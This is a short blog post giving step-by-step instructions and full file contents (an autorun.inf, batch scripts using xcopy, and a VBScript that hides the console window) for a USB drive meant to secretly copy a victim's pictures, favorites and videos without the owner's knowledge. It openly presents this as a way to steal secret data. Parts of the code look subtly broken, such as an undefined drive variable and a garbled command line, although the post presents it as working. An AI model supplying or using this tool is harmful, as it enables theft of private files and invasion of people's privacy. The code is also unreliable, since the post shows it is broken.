We are often curious to know about the Data and Files which are in others Computer but we are not allowed to do so due to restrictions by the Computer owner or because of some other Reason.
But here is a Trick which can help us to Copy and Steal all the Secret Data or Files from the Victims Computer by just plugging the USB or Pendrive to the Computer.
This Trick could prove to be very helpfull and it would Copy and Steal all the Data without
the Confirmation and Knowing of Computer Owner.First File
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
3) Save this file as autorun.inf.
Second File
1) Open Notepad.
2) Copy and Paste the following Code :
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls
3) Save this file as File.bat.
Third File
1) Open Notepad.
2) Copy and Paste the following Code :
CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False
3) Save this file as Invisible.vbs.
Fourt & Last File
1) open Notepad.
2) Now Copy and Paste the following Code :
wscript.exe \invisible.vbs file.bat
3) Save this as Launch.bat.
Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.
1) Create a folder named “Data” where the Stolen contents would be Copied automatically.
2) Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.
So it is simple Trick to Secretly Copy and Steal Data from Computer to a USB or Pendrive
No comments:
Post a Comment